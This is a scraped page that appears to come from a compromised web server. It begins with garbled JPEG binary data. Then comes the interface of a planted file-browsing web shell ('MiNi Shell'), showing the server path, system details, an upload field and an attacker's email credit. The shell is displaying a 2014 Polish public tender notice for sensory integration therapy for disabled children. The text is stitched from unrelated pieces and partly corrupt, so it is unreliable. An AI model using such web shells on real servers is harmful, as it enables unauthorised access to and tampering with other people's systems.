JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/20366-N-2014.html

<p class="kh_header"><b>Ostrów Mazowiecka: Przeprowadzenie usług obejmujących zajęcia terapii integracji sensorycznej dla dzieci niepełnosprawnych, w ramach Programu Aktywności Lokalnej w projekcie Twoja przyszłość w Twoich rękach</b><br>
<b>Numer ogłoszenia: 20366 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Widnichowska 20, 07-300 Ostrów Mazowiecka, woj. mazowieckie, tel. 29 645 53 98, faks 29 645 53 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowmaz.pcpr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usług obejmujących zajęcia terapii integracji sensorycznej dla dzieci niepełnosprawnych, w ramach Programu Aktywności Lokalnej w projekcie Twoja przyszłość w Twoich rękach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie usług obejmujących zajęcia terapii integracji sensorycznej dla dzieci niepełnosprawnych, w ramach Programu Aktywności Lokalnej w projekcie Twoja przyszłość w Twoich rękach, realizowanym przez Powiatowe Centrum Pomocy Rodzinie w  Ostrowi Mazowieckiej  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1 Rozwój  i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. 
Szczegółowy opis przedmiotu zamówienia: 
1. ilość godzin zlecenia do wykonania wynosi 920 godzin (1 godzina= 60 minut)  indywidualnych zajęć dla rodziców dzieci niepełnosprawnych i ich dzieci/ średnio po ok.22 godzin tygodniowo; 
2. ilość godzin wykonywania zlecenia może ulec zmianie;
3. Wykonawca będzie prowadził indywidualne zajęcia z dziećmi niepełnosprawnymi w zakresie terapii integracji sensorycznej, przed rozpoczęciem prowadzenia terapii przeprowadzi diagnozę każdego dziecka do niej zakwalifikowanego;
4. materiały niezbędne do prowadzenia spotkań zostaną przygotowane przez Wykonawcę i wydrukowane w Biurze Projektu, istnieje możliwość zakupu przez Zamawiającego materiałów edukacyjnych, niezbędnych do prowadzenia zajęć;
5. Wykonywanie usług odbywać się będzie w siedzibie Powiatowego Centrum Pomocy Rodzinie, ul. Widnichowska 20, 07-300 Ostrów Mazowiecka. Zamawiający zapewni sprzęt i salę do prowadzenia terapii;
6. Wykonawca jest zobowiązany do przygotowania i prowadzenia Indywidualnych kart dla wszystkich uczestników biorących udział w terapii oraz list obecności; wszystkie w.w. dokumenty zostaną wydrukowane w Biurze Projektu. Po zakończeniu wykonywania zamówienia, rozwiązaniu lub wygaśnięciu umowy oryginały wszystkich w.w. dokumentów zostaną przekazane Zamawiającemu, Wykonawca nie ma prawa do ich wykorzystywania poza wykonywaniem zamówienia na rzecz projektu Twoja przyszłość w Twoich rękach;
7. Wszystkie dokumenty muszą być oznakowane zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL. Wszystkie niezbędne oznaczenia są dostępne w Biurze Projektu;
8. Wykonawca zobowiązany jest do przedstawienia co miesiąc, wraz z rachunkiem, miesięcznej karty czasu pracy osoby wykonującej zlecenie, a w przypadku zatrudnienia tej osoby w innych projektach 
finansowanych w ramach Narodowych Strategicznych Ram Odniesienia, musi przedkładać razem z rachunkiem i miesięczną kartą czasu pracy, dziennik czasu pracy z wyszczególnionym czasem pracy na rzecz każdego z projektów;
9. wykonywanie zlecenia odbywać się będzie w czasie uzgodnionym z Zamawiającym; możliwe terminy wykonywania zlecenia: poniedziałki, wtorki, środy, czwartki i piątki; możliwe godziny wykonywania zlecenia: 800-1600. Wykonywanie zlecenia w innych godzinach lub dniach musi być wcześniej uzgodnione z Zamawiającym i nie może mieć charakteru stałego tzn. Zamawiający może wyrazić zgodę na wykonywanie zamówienia w innych niż wyżej określone, terminach tylko w wyjątkowych przypadkach np. odpracowania zajęć, które nie odbędą się w planowym terminie;
10. Wykonawca  zobowiązany jest do przechowywania dokumentów dotyczących wykonywanego zlecenia tj. umowa, karty czasu pracy, dzienniki czasu pracy, rachunki do dnia 31.12.2020 r. i udostępnienia ich na życzenie Zamawiającego lub innych instytucji kontrolujących, upoważnionych do tego na podstawie odrębnych przepisów.
11. termin realizacji zamówienia: 10.02.2014- 15.12.2014r.
12. termin płatności: co miesiąc, po przedstawieniu i zaakceptowaniu przez upoważnionych przedstawicieli Zamawiającego wymaganych dokumentów rozliczeniowych tj. rachunku, miesięcznej karty czasu pracy i dziennika czasu pracy (jeśli jest wymagany). W przypadku braku środków z dotacji, płatność zostanie dokonana po ich otrzymaniu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przypadku konieczności zwiększenia lub zmniejszenia liczby godzin ze względu na potrzeby uczestników biorących udział w projekcie istnieje możliwość zmiany ilości godzin zlecenia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9, 85.31.25.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu  złożonego przez Wykonawcę (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, zdobył praktyczne doświadczenie w prowadzeniu terapii integracji sensorycznej z dziećmi do 16-ego roku życia. Ocena spełnienia w/w warunku dokonana zostanie w oparciu o informacje zawarte w złożonym wykazie (załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi propozycję tygodniowego harmonogramu wykonywania przedmiotu zamówienia, zgodnego z pkt. 2.9. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 2) oraz wykazu doświadczenia, wykształcenia i propozycji harmonogramu (załącznik nr 4) oraz kserokopii dokumentów potwierdzających posiadanie wymaganego wykształcenia i uprawnień.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca lub osoba bezpośrednio wykonująca zamówienie posiada ukończone studia wyższe magisterskie oraz posiada uprawnienia do prowadzenia terapii i przeprowadzenia diagnozy SI, potwierdzone ukończonym dwustopniowym kursem na terapeutę integracji sensorycznej. Wskazana przez Wykonawcę osoba nie może zostać zastąpiona przez inną osobę chyba, że wskazana inna osoba będzie spełniała w.w. warunek dotyczący posiadanego wykształcenia i uprawnień do wykonywania przedmiotowego zamówienia. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu  złożonego przez Wykonawcę (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu  złożonego przez Wykonawcę (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik Nr 1 do SIWZ- Formularz oferty.
Załącznik Nr 2 do SIWZ- Oświadczenie o spełnieniu warunków wymaganych z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U z 2010 r. Nr 113, poz. 759 z  późń. zm.),
Załącznik Nr 3 do SIWZ- oświadczenie o  braku podstaw do wykluczenia z postepowania o udzielenie zamówienia publicznego w okolicznościach o których mowa w art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U z 2010 r. Nr 113, poz. 759 z późn. zm.) ,
Załącznik Nr 4 do SIWZ- wykaz usług zrealizowanych   przez wykonawcę, niezbędnych do potwierdzenia spełniania warunku wiedzy i doświadczenia oraz wykaz osób ze wskazaniem posiadanego wykształcenia oraz propozycja tygodniowego harmonogramu wykonywania zamówienia w celu potwierdzenia warunku dotyczącego osób zdolnych do wykonania zamówienia,
Załącznik Nr 5 do SIWZ- Oświadczenie Wykonawcy/osoby realizującej projekt o zaangażowaniu/niezaangażowaniu w realizację innych projektów finansowanych w ramach Programu Operacyjnego Kapitał Ludzki, jak również w ramach innych projektów Narodowe Strategiczne Ramy Odniesienia,
Załącznik Nr 6 do SIWZ- Projekt umowy- zlecenia
Załącznik nr 7 do SIWZ- Projekt umowy z podmiotem prowadzącym działalność gospodarczą</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://biuletyn.abip.pl/pcprostrowmaz/index.php?l1_id=6254&l2_id=7568&komunikat=7568&parent=7568&t=m<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Widnichowska 20
07-300 Ostrów Mazowiecka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2014 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Widnichowska 20
07-300 Ostrów Mazowiecka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Twoja przyszłość w Twoich rękach jest współfinansowany ze środków Europejskiego Funduszu Społecznego w 85%..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com